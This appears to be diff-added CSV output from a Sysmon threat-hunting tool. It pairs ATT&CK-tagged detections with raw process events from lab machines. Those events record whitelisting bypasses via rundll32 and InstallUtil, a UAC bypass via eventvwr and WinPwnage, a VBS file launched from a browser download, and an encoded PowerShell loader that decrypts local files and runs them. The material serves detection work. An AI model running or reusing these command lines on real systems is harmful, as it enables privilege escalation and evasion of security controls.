+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16452
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 14:18:09.573
+ 365ABB72-2B21-5CD8-0000-001039DD2500
+ 816
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2B1B-5CD8-0000-0010CCC92500
+ 3320
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16452
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 14:18:09.573
+ 365ABB72-2B21-5CD8-0000-001039DD2500
+ 816
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2B1B-5CD8-0000-0010CCC92500
+ 3320
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424115
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:17.542
+ 747F3D96-51F9-5F93-0000-0010551E5E00
+ 9116
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51F9-5F93-0000-001003125E00
+ 7552
+ C:\Windows\System32\rundll32.exe
+ Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424115
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:17.542
+ 747F3D96-51F9-5F93-0000-0010551E5E00
+ 9116
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51F9-5F93-0000-001003125E00
+ 7552
+ C:\Windows\System32\rundll32.exe
+ Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\eventvwr.exe , Parent CommandLine ("C:\Windows\system32\eventvwr.exe") in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 11116
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-09 01:59:28.903
+ 365ABB72-8980-5CD3-0000-0010134D1F00
+ 3840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-863B-5CD3-0000-00204A390100
+ 0x1394a
+ 1
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-8980-5CD3-0000-00105F451F00
+ 3884
+ C:\Windows\System32\eventvwr.exe
+ "C:\Windows\system32\eventvwr.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424115
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:17.542
+ 747F3D96-51F9-5F93-0000-0010551E5E00
+ 9116
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51F9-5F93-0000-001003125E00
+ 7552
+ C:\Windows\System32\rundll32.exe
+ Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.034674,2019-05-27T05:29:20.034674+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5976
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.994
+ 365ABB72-3D6F-5CEB-0000-001032DBFF00
+ 1900
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1088] Bypass User Account Control - Process,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 11116
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-09 01:59:28.903
+ 365ABB72-8980-5CD3-0000-0010134D1F00
+ 3840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-863B-5CD3-0000-00204A390100
+ 0x1394a
+ 1
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-8980-5CD3-0000-00105F451F00
+ 3884
+ C:\Windows\System32\eventvwr.exe
+ "C:\Windows\system32\eventvwr.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 11116
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-09 01:59:28.903
+ 365ABB72-8980-5CD3-0000-0010134D1F00
+ 3840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
+ C:\Windows\system32\
+ IEWIN7\IEUser
+ 365ABB72-863B-5CD3-0000-00204A390100
+ 0x1394a
+ 1
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-8980-5CD3-0000-00105F451F00
+ 3884
+ C:\Windows\System32\eventvwr.exe
+ "C:\Windows\system32\eventvwr.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6171
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:43.969
+ 365ABB72-FE6B-5CEB-0000-00102A090C00
+ 1536
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6171
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:43.969
+ 365ABB72-FE6B-5CEB-0000-00102A090C00
+ 1536
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1557621155.258262,2019-05-12T04:32:35.258262+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn elevator ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16245
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 00:32:35.070
+ 365ABB72-69A3-5CD7-0000-0010306F2200
+ 3752
+ C:\Windows\System32\schtasks.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Manages scheduled tasks
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\schtasks.exe" /run /tn elevator
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-5DEC-5CD7-0000-00204A380100
+ 0x1384a
+ 1
+ High
+ SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
+ 365ABB72-6998-5CD7-0000-00104E422200
+ 2740
+ C:\Python27\python.exe
+ python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557670689.589507,2019-05-12T18:18:09.589507+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16451
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 14:18:03.558
+ 365ABB72-2B1B-5CD8-0000-0010CCC92500
+ 3320
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-2523-5CD8-0000-00204C360100
+ 0x1364c
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-252D-5CD8-0000-001019E20300
+ 2800
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1606412291.655964,2020-11-26T21:38:11.655964+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 2362770
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2020-11-26 17:38:11.175
+ 00247C92-E803-5FBF-0000-0010F2BFB40C
+ 16980
+ C:\Windows\System32\cmd.exe
+ 10.0.18362.449 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\windows\system32\cmd.exe"
+ C:\windows\system32\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-3404-5FBE-0000-0020E0C90600
+ 0x6c9e0
+ 1
+ High
+ SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 00247C92-E803-5FBF-0000-0010CDB9B40C
+ 17336
+ C:\Windows\System32\taskhostw.exe
+ taskhostw.exe $(Arg0)
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1560583325.973009,2019-06-15T11:22:05.973009+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 7681
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-06-15 07:22:05.660
+ 365ABB72-9C9D-5D04-0000-001039CE1600
+ 172
+ C:\Windows\System32\wscript.exe
+ 5.8.7600.16385
+ Microsoft ® Windows Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ "C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-98E4-5D04-0000-0020A4350100
+ 0x135a4
+ 1
+ High
+ SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983
+ 365ABB72-9C8E-5D04-0000-0010D0421600
+ 540
+ C:\Program Files\Internet Explorer\iexplore.exe
+ "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435993.225412,2019-07-30T01:33:13.225412+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4900
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:13.169
+ 747F3D96-6619-5D3F-0000-0010FDE78600
+ 5116
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
